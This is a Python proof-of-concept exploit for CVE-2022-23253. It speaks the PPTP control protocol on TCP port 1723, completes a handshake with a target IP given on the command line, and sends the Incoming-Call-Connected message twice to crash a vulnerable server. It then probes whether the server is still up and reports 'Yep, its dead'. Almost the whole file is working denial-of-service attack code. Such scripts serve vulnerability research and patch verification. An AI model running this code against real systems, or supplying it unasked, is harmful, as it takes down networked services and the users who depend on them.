"""Proof-of-concept client for CVE-2022-23253.

The script speaks the PPTP control protocol over TCP: it opens a control
connection, announces an incoming call and then sends the
Incoming-Call-Connected message twice, after which it checks whether the
target still accepts TCP connections.
"""
import argparse
import secrets
import select
import socket
import struct

CTL_PORT = 1723
TEST_SERVER = ""

# CTL Message Types
gStartControlConnectionRequest = 1
gStartControlConnectionReply = 2
gIncomingCallRequest = 9
gIncomingCallReply = 10
gIncomingCallConnected = 11

# Framing Capabilities
gAsynchronousFraming = 0x1
gSynchronousFraming = 0x2

# Bearer Capabilities
gAnalogAccessSupported = 0x1
gDigitalAccessSupported = 0x2


class CtlClient():
    """Minimal TCP client for the PPTP control channel.

    Attributes:
        IP: Address of the server to connect to.
        Port: TCP port of the control channel.
        Socket: The connected socket, or None when no connection exists.
        IsConnected: True once CtlConnect() has succeeded.
    """

    # Size of each recv() call and how long (seconds) to wait for data.
    RECV_CHUNK_SIZE = 1024
    RECV_TIMEOUT = 1

    def __init__(self, serverIp, serverPort=CTL_PORT):
        # NOTE: the serverPort default is bound when the class is defined, so
        # callers that honour a runtime-configured port must pass it in.
        self.IP = serverIp
        self.Port = serverPort
        self.Socket = None
        self.IsConnected = False

    def CtlCloseConn(self):
        """Close the control connection; safe to call when not connected."""
        if self.Socket is not None:
            self.Socket.close()
            self.Socket = None
        self.IsConnected = False

    def CtlSendMsg(self, CtlMessage, multiplier=1):
        """Serialise one message and send it ``multiplier`` times back to back.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")
        ctlmsgbuf: bytes = CtlMessage.build() * multiplier
        # sendall() keeps writing until the whole buffer is out; plain send()
        # may transmit only a prefix.
        self.Socket.sendall(ctlmsgbuf)

    def CtlMultiSendMsg(self, CtlMessageArray):
        """Serialise several messages and send them as one buffer.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")
        sendBuffer = b"".join(CtlMsg.build() for CtlMsg in CtlMessageArray)
        self.Socket.sendall(sendBuffer)

    def CtlRecvMsg(self):
        """Return whatever the server sends within the receive timeout.

        Reading continues while full chunks keep arriving. Every recv() is
        guarded by select() so a reply whose length is an exact multiple of
        the chunk size cannot block forever.

        Returns:
            The received bytes; ``b""`` when nothing arrived in time.
        """
        chunks = []
        while True:
            readable, _, _ = select.select(
                [self.Socket], [], [], self.RECV_TIMEOUT)
            if not readable:
                break
            chunk = self.Socket.recv(self.RECV_CHUNK_SIZE)
            chunks.append(chunk)
            if len(chunk) < self.RECV_CHUNK_SIZE:
                # Short (or empty, i.e. peer closed) read: nothing more queued.
                break
        return b"".join(chunks)

    def CtlConnect(self, timeout=None):
        """Connect to the Ctl server.

        Args:
            timeout: Optional socket timeout in seconds; falsy means blocking.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if timeout:
                sock.settimeout(timeout)
            sock.connect((self.IP, self.Port))
        except Exception:
            # Do not leak the descriptor when the connection attempt fails.
            sock.close()
            raise
        self.Socket = sock
        self.IsConnected = True


class ControlMessage():
    """Common 12-byte header shared by every PPTP control message.

    Args:
        messageType: Control message type (one of the g* type constants).
        messageLength: Value for the length field of the header.
        setSize: When true, build() overwrites the length field with the
            message's nominal on-wire size.
        packetBytes: When given (and non-empty) the header is parsed from
            these bytes and the other arguments are ignored.
    """

    SIZE = 0xC  # 12 byte header
    HEADER_FORMAT = ">HHIHH"

    def __init__(self, messageType, messageLength, setSize=False, packetBytes=None):
        if packetBytes:
            self.SetSize = 0
            self.__fromBytes(packetBytes)
        else:
            self.MessageLength = messageLength
            self.PptpMessageType = 0x1
            # Magic number
            self.CtlMagic = 0x1A2B3C4D
            self.CtlMessageType = messageType
            self.Reserved0 = 0
            self.SetSize = setSize

    def _wire_size(self):
        """Return the nominal total length (header + body) of this message."""
        cls = type(self)
        if cls is ControlMessage:
            return ControlMessage.SIZE
        return ControlMessage.SIZE + cls.SIZE

    def build(self):
        """Serialise the header to its 12-byte big-endian wire form."""
        if self.SetSize:
            # Use the preconfigured set size for this packet. The previous
            # code read a name-mangled attribute that never existed; the
            # total length is used because the PPTP length field counts the
            # whole message, header included.
            self.MessageLength = self._wire_size()
        return struct.pack(
            self.HEADER_FORMAT,
            self.MessageLength,
            self.PptpMessageType,
            self.CtlMagic,
            self.CtlMessageType,
            self.Reserved0,
        )

    def __fromBytes(self, bytebuffer):
        """Populate the header fields from the first 12 bytes of a packet."""
        (self.MessageLength,
         self.PptpMessageType,
         self.CtlMagic,
         self.CtlMessageType,
         self.Reserved0) = struct.unpack_from(self.HEADER_FORMAT, bytebuffer, 0)


class StartControlConnectionRequest(ControlMessage):
    """Start-Control-Connection-Request message (type 1)."""

    SIZE = 0x90

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported,
                 maxChannels=0x0, firmwareRevision=0x0,
                 hostName=b"A" * 64, vendorString=b"B" * 64):
        super().__init__(gStartControlConnectionRequest,
                         ControlMessage.SIZE + StartControlConnectionRequest.SIZE)
        self.protocolVersion = 0x100
        self.Reserved1 = 0
        self.FramingCapabilities = framing
        self.BearerCapabilities = bearer
        self.MaxChannels = maxChannels
        self.FirmwareRevision = firmwareRevision
        self.HostName = hostName  # 64 byte host name string
        self.VendorString = vendorString  # 64 byte vendor string

    def build(self):
        """Serialise header and body; the two strings are appended as given."""
        fixed = struct.pack(
            ">HHIIHH",
            self.protocolVersion,
            self.Reserved1,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return super().build() + fixed + self.HostName + self.VendorString


class StartControlConnectionReply(ControlMessage):
    """Start-Control-Connection-Reply message (type 2).

    Pass ``packetBytes`` to parse a received reply; otherwise the keyword
    arguments populate a reply that can be serialised with build().
    """

    SIZE = 0x90
    FIXED_FORMAT = ">HBBIIHH"
    STRING_FIELD_SIZE = 64

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported,
                 maxChannels=0x0, firmwareRevision=0x0,
                 hostName=b"A" * 64, vendorString=b"B" * 64,
                 resultCode=0, errorCode=0, packetBytes=None):
        super().__init__(gStartControlConnectionReply,
                         ControlMessage.SIZE + StartControlConnectionReply.SIZE,
                         packetBytes=packetBytes)
        if packetBytes:
            self.__fromBytes(packetBytes)
        else:
            self.protocolVersion = 0x100
            self.ResultCode = resultCode
            self.ErrorCode = errorCode
            self.FramingCapabilities = framing
            self.BearerCapabilities = bearer
            self.MaxChannels = maxChannels
            self.FirmwareRevision = firmwareRevision
            self.HostName = hostName  # 64 byte host name string
            self.VendorString = vendorString  # 64 byte vendor string

    def build(self):
        """Serialise header and body; the two strings are appended as given."""
        fixed = struct.pack(
            self.FIXED_FORMAT,
            self.protocolVersion,
            self.ResultCode,
            self.ErrorCode,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return super().build() + fixed + self.HostName + self.VendorString

    def __fromBytes(self, bytebuffer):
        """Populate the body fields from a received packet.

        The fixed-width fields are required (struct.error if missing). The two
        string fields are taken by slicing, so a truncated packet yields
        shorter (possibly empty) byte strings instead of an error.
        """
        (self.protocolVersion,
         self.ResultCode,
         self.ErrorCode,
         self.FramingCapabilities,
         self.BearerCapabilities,
         self.MaxChannels,
         self.FirmwareRevision) = struct.unpack_from(
            self.FIXED_FORMAT, bytebuffer, ControlMessage.SIZE)
        host_start = ControlMessage.SIZE + struct.calcsize(self.FIXED_FORMAT)
        vendor_start = host_start + self.STRING_FIELD_SIZE
        vendor_end = vendor_start + self.STRING_FIELD_SIZE
        # Previously these stayed the integer 0, which made build() fail on a
        # parsed reply.
        self.HostName = bytes(bytebuffer[host_start:vendor_start])
        self.VendorString = bytes(bytebuffer[vendor_start:vendor_end])


class IncomingCallRequest(ControlMessage):
    """Incoming-Call-Request message (type 9).

    When ``packetBytes`` is given only the header is parsed from it; the body
    fields always come from the keyword arguments.
    """

    SIZE = 0xD0

    def __init__(self, CallId=1337, CallSerialNumber=1338,
                 CallBearerType=gAnalogAccessSupported, PhysicalChannelId=0,
                 DialedNumberLength=64, DialingNumberLength=64,
                 DialedNumber=64 * b"A", DialingNumber=64 * b"B",
                 Subaddress=64 * b"C", packetBytes=None):
        super().__init__(gIncomingCallRequest,
                         IncomingCallRequest.SIZE + ControlMessage.SIZE,
                         packetBytes=packetBytes)
        self.CallId = CallId
        self.CallSerialNumber = CallSerialNumber
        self.CallBearerType = CallBearerType
        self.PhysicalChannelId = PhysicalChannelId
        self.DialedNumberLength = DialedNumberLength
        self.DialingNumberLength = DialingNumberLength
        self.DialedNumber = DialedNumber
        self.DialingNumber = DialingNumber
        self.Subaddress = Subaddress

    def build(self):
        """Serialise header and body; the three strings are appended as given."""
        fixed = struct.pack(
            ">HHIIHH",
            self.CallId,
            self.CallSerialNumber,
            self.CallBearerType,
            self.PhysicalChannelId,
            self.DialedNumberLength,
            self.DialingNumberLength,
        )
        return (super().build() + fixed + self.DialedNumber
                + self.DialingNumber + self.Subaddress)


class IncomingCallReply(ControlMessage):
    """Incoming-Call-Reply message (type 10).

    Pass ``packetBytes`` to parse a received reply; otherwise the keyword
    arguments populate a reply that can be serialised with build().
    """

    SIZE = 0xC
    BODY_FORMAT = ">HHBBHHH"

    def __init__(self, CallId=0x1337, PeersCallId=0x1338, ResultCode=1,
                 ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32,
                 packetBytes=None):
        super().__init__(gIncomingCallReply,
                         IncomingCallReply.SIZE + ControlMessage.SIZE,
                         packetBytes=packetBytes)
        if packetBytes:
            self.fromBytes(packetBytes)
        else:
            self.CallId = CallId
            self.PeersCallId = PeersCallId
            self.ResultCode = ResultCode
            self.ErrorCode = ErrorCode
            # A stray trailing comma used to turn this into a 1-tuple, which
            # made build() raise struct.error.
            self.PacketRecvWindowSize = PacketRecvWindowSize
            self.PacketTransitDelay = PacketTransitDelay
            self.Reserved1 = 0

    def build(self):
        """Serialise header and body to the 24-byte wire form."""
        body = struct.pack(
            self.BODY_FORMAT,
            self.CallId,
            self.PeersCallId,
            self.ResultCode,
            self.ErrorCode,
            self.PacketRecvWindowSize,
            self.PacketTransitDelay,
            self.Reserved1,
        )
        return super().build() + body

    def fromBytes(self, bytebuffer):
        """Populate the body fields from a received packet.

        Raises:
            struct.error: If the packet is too short to hold the body.
        """
        (self.CallId,
         self.PeersCallId,
         self.ResultCode,
         self.ErrorCode,
         self.PacketRecvWindowSize,
         self.PacketTransitDelay,
         self.Reserved1) = struct.unpack_from(
            self.BODY_FORMAT, bytebuffer, ControlMessage.SIZE)


class IncomingCallConnected(ControlMessage):
    """Incoming-Call-Connected message (type 11)."""

    SIZE = 0x10
    BODY_FORMAT = ">HHIHHI"

    def __init__(self, PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64,
                 PacketTransmitDelay=0, FramingType=gAsynchronousFraming,
                 packetBytes=None):
        super().__init__(gIncomingCallConnected,
                         IncomingCallConnected.SIZE + ControlMessage.SIZE,
                         packetBytes=packetBytes)
        if packetBytes:
            # Previously no body attribute was set on this path, so build()
            # failed with AttributeError. Start from zeros and decode the body
            # only when the packet is long enough, so short packets that were
            # accepted before are still accepted.
            self.PeerCallId = 0
            self.Reserved1 = 0
            self.ConnectSpeed = 0
            self.PacketRecvWindowSize = 0
            self.PacketTransmitDelay = 0
            self.FramingType = 0
            if len(packetBytes) >= ControlMessage.SIZE + IncomingCallConnected.SIZE:
                (self.PeerCallId,
                 self.Reserved1,
                 self.ConnectSpeed,
                 self.PacketRecvWindowSize,
                 self.PacketTransmitDelay,
                 self.FramingType) = struct.unpack_from(
                    self.BODY_FORMAT, packetBytes, ControlMessage.SIZE)
        else:
            self.PeerCallId = PeerCallId
            self.Reserved1 = 0
            self.ConnectSpeed = ConnectSpeed
            self.PacketRecvWindowSize = PacketRecvWindowsSize
            self.PacketTransmitDelay = PacketTransmitDelay
            self.FramingType = FramingType

    def build(self):
        """Serialise header and body to the 28-byte wire form."""
        body = struct.pack(
            self.BODY_FORMAT,
            self.PeerCallId,
            self.Reserved1,
            self.ConnectSpeed,
            self.PacketRecvWindowSize,
            self.PacketTransmitDelay,
            self.FramingType,
        )
        return super().build() + body


def startControlSession():
    """Open a control connection to TEST_SERVER and complete the handshake.

    Returns:
        The connected CtlClient.

    Raises:
        ValueError: If the server does not answer or reports a failure.
    """
    # Pass the port explicitly: CtlClient's default was bound at definition
    # time and does not follow the --port value stored in CTL_PORT.
    pocClient = CtlClient(TEST_SERVER, CTL_PORT)
    pocClient.CtlConnect()
    try:
        pocClient.CtlSendMsg(StartControlConnectionRequest())
        StartControlReply_raw = pocClient.CtlRecvMsg()
        if not StartControlReply_raw:
            raise ValueError("[:(] No reply received to the start control connection request")
        initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw)
        if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1:
            raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....")
    except Exception:
        # The caller never receives the client on failure, so close it here.
        pocClient.CtlCloseConn()
        raise
    return pocClient


def poke_server():
    """Report whether TEST_SERVER still accepts TCP connections."""
    print("[+] Pokeing the target....")
    poke_client = CtlClient(TEST_SERVER, CTL_PORT)
    try:
        poke_client.CtlConnect(timeout=1)
    except OSError:
        # Refused, unreachable and timed-out connects are all OSError.
        print("[+] Yep, its dead")
    else:
        print("[-] Its alive!?")
        poke_client.CtlCloseConn()


def trigger_cve_2022_23253():
    """Run the PoC sequence against TEST_SERVER and check the outcome.

    Raises:
        ValueError: If the server does not answer the incoming-call request
            or reports a failure.
    """
    print("[+] Starting PPTP control connection")
    pocClient = startControlSession()
    try:
        newCallId = secrets.randbelow(0x10000)
        newCallSerial = secrets.randbelow(0x10000)
        newIncomingCall = IncomingCallRequest(CallId=newCallId,
                                              CallSerialNumber=newCallSerial)

        # Requests Causing Issues
        print("[+] Creating new incoming call")
        pocClient.CtlSendMsg(newIncomingCall)
        ICReply_raw = pocClient.CtlRecvMsg()
        if not ICReply_raw:
            # An empty buffer would otherwise be mistaken for "no packet
            # given" and produce a default reply that looks successful.
            raise ValueError("[:(] No reply received to the incoming call request")
        newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw)
        print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId))
        if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0:
            raise ValueError("[:(] PoC failed unexpecadle due to server side error... ")

        newIncomingCallConnected = IncomingCallConnected(
            PeerCallId=newIncomingCallReply.CallId,
            ConnectSpeed=64,
            PacketRecvWindowsSize=newIncomingCallReply.PacketRecvWindowSize,
            PacketTransmitDelay=newIncomingCallReply.PacketTransitDelay,
        )
        print("[+] Triggering Bug!")
        # The same message is deliberately sent twice.
        pocClient.CtlSendMsg(newIncomingCallConnected)
        pocClient.CtlSendMsg(newIncomingCallConnected)
        print("[+] Machine should be dead now, lets check!")
        # Probe while the control connection is still open, as before.
        poke_server()
    finally:
        pocClient.CtlCloseConn()


def main():
    """Parse the command line, ask for confirmation and run the PoC."""
    global TEST_SERVER
    global CTL_PORT
    parser = argparse.ArgumentParser(description="PoC for CVE-2022-23253!")
    parser.add_argument('--ip', type=str, required=True, dest="ip_address",
                        help="IP address of the target server")
    parser.add_argument('--port', type=int, default=CTL_PORT, dest="ctl_port",
                        help="Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT))
    args = parser.parse_args()
    TEST_SERVER = args.ip_address
    CTL_PORT = args.ctl_port
    continue_to_trigger = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ")
    if continue_to_trigger.strip().lower() == "y":
        print("[+] Triggering Bug!")
        trigger_cve_2022_23253()
    else:
        print("[+] GoodBye!")


if __name__ == '__main__':
    main()